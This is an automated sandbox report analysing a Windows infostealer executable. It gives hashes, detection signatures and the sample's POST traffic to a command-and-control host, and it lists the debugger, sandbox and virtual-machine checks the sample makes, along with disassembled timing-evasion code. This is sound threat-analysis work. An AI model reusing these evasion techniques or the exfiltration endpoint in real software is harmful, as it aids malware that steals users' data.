Windows Analysis Report
t6VDbnvGeN.exe

Overview

General Information

Sample name:t6VDbnvGeN.exe
renamed because original name is a hash value
Original sample name:9e3eebdf7f1998324106447a4eb441c8.exe
Analysis ID:1578907
MD5:9e3eebdf7f1998324106447a4eb441c8
SHA1:d12942ff362dcd14ae488b68c5c9585dea00098f
SHA256:5407d390bc945fe70785068124bf0a35d110e179aae137cdc67cce85824915bf
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • t6VDbnvGeN.exe (PID: 5140 cmdline: "C:\Users\user\Desktop\t6VDbnvGeN.exe" MD5: 9E3EEBDF7F1998324106447A4EB441C8)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: t6VDbnvGeN.exeAvira: detected
Source: t6VDbnvGeN.exeReversingLabs: Detection: 42%
Source: t6VDbnvGeN.exeVirustotal: Detection: 52%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: t6VDbnvGeN.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: -----BEGIN PUBLIC KEY-----1_2_007EDCF0
Source: t6VDbnvGeN.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebp+04h], 424D53FFh1_2_0082A5B0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0082B560
Source: t6VDbnvGeN.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_007C255D
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_007C29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560191
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088A8C0 recvfrom,1_2_0088A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560191
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRE_
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: .idata
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007DCD40 appears 75 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00805340 appears 50 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007DCCD0 appears 55 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00804F40 appears 347 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C75A0 appears 710 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 008050A0 appears 101 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007CC960 appears 37 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C73F0 appears 114 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 008A44A0 appears 76 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00977220 appears 99 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00804FD0 appears 291 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007CCAA0 appears 64 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C71E0 appears 47 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 0099CBC0 appears 90 times
Source: t6VDbnvGeN.exeStatic PE information: Section: jyayxkzc ZLIB complexity 0.9943974834543126
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: t6VDbnvGeN.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: t6VDbnvGeN.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: kernel.appcore.dll
Source: t6VDbnvGeN.exeStatic file information: File size 4454912 > 1048576
Source: t6VDbnvGeN.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: t6VDbnvGeN.exeStatic PE information: Raw size of jyayxkzc is bigger than: 0x100000 < 0x1b7200

Data Obfuscation

Source: C:\Users\user\Desktop\t6VDbnvGeN.exeUnpacked PE file: 1.2.t6VDbnvGeN.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jyayxkzc:EW;tlfatyfb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jyayxkzc:EW;tlfatyfb:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: t6VDbnvGeN.exeStatic PE information: real checksum: 0x444872 should be: 0x445cdc
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: .idata
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: jyayxkzc
Source: t6VDbnvGeN.exeStatic PE information: section name: tlfatyfb
Source: t6VDbnvGeN.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADD534 push esp; retf 1_3_01ADD535
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01ADCA78 push 5401ACC5h; retf 1_3_01ADCA85
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_3_01AD4B49 push B5FBD157h; iretd 1_3_01AD4B54
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B441D0 push eax; mov dword ptr [esp], edx1_2_00B441D5
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00842340 push eax; mov dword ptr [esp], 00000000h1_2_00842343
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0087C7F0 push eax; mov dword ptr [esp], 00000000h1_2_0087C743
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00800AC0 push eax; mov dword ptr [esp], 00000000h1_2_00800AC4
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00821430 push eax; mov dword ptr [esp], 00000000h1_2_00821433
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008439A0 push eax; mov dword ptr [esp], 00000000h1_2_008439A3
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0081DAD0 push eax; mov dword ptr [esp], edx1_2_0081DAD1
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B49F40 push dword ptr [eax+04h]; ret 1_2_00B49F6F
Source: t6VDbnvGeN.exeStatic PE information: section name: jyayxkzc entropy: 7.954718124398861

Boot Survival

Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: PROCMON.EXE
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: X64DBG.EXE
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: WINDBG.EXE
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9210 second address: 10C9232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1C28FAFD6Dh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C73C9 second address: 10C73DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1C29045F06h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C73DD second address: 10C73E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C981F second address: 10C9839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9839 second address: 10C9859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99D7 second address: 10C99DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99DB second address: 10C99DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99DF second address: 10C9A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a jng 00007F1C29045F06h 0x00000010 pop eax 0x00000011 pop edi 0x00000012 nop 0x00000013 jmp 00007F1C29045F0Ch 0x00000018 mov bx, 516Ah 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, dword ptr [ebp+122D34B9h] 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 call 00007F1C29045F10h 0x00000035 mov bx, dx 0x00000038 pop ebx 0x00000039 mov eax, dword ptr [ebp+122D1565h] 0x0000003f add edi, 02135C03h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F1C29045F08h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov dword ptr [ebp+124623E0h], ebx 0x00000067 nop 0x00000068 jmp 00007F1C29045F15h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jng 00007F1C29045F0Ch 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9A7D second address: 10C9A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC90A second address: 10CC933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F1C29045F16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F1C29045F06h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC933 second address: 10CC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC937 second address: 10CC93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC93D second address: 10CC942 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CA95D second address: 10CA961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC942 second address: 10CC97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, 2488h 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D2B96h], esi 0x00000014 mov edi, esi 0x00000016 push 00000000h 0x00000018 or ebx, dword ptr [ebp+122D2F6Fh] 0x0000001e sub dword ptr [ebp+12451761h], edi 0x00000024 xchg eax, esi 0x00000025 push edx 0x00000026 jmp 00007F1C28FAFD6Dh 0x0000002b pop edx 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CAA57 second address: 10CAA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CAA5C second address: 10CAA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CB90E second address: 10CB947 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1C29045F13h 0x00000010 jp 00007F1C29045F06h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1C29045F0Fh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CE89E second address: 10CE8A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CE935 second address: 10CE93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CF9EE second address: 10CF9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D09D3 second address: 10D0A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F1C29045F08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, ax 0x00000029 mov edi, dword ptr [ebp+122D3479h] 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+12450869h], ebx 0x00000037 jmp 00007F1C29045F0Ch 0x0000003c push 00000000h 0x0000003e mov edi, 3C83A524h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007F1C29045F06h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D0A36 second address: 10D0A3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D2945 second address: 10D2999 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1C29045F0Ch 0x00000008 jns 00007F1C29045F06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 clc 0x00000014 push 00000000h 0x00000016 mov ebx, dword ptr [ebp+122D337Bh] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F1C29045F08h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 ja 00007F1C29045F07h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F1C29045F0Fh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D2999 second address: 10D29CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1C28FAFD75h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C28FAFD6Fh 0x00000019 rdtsc
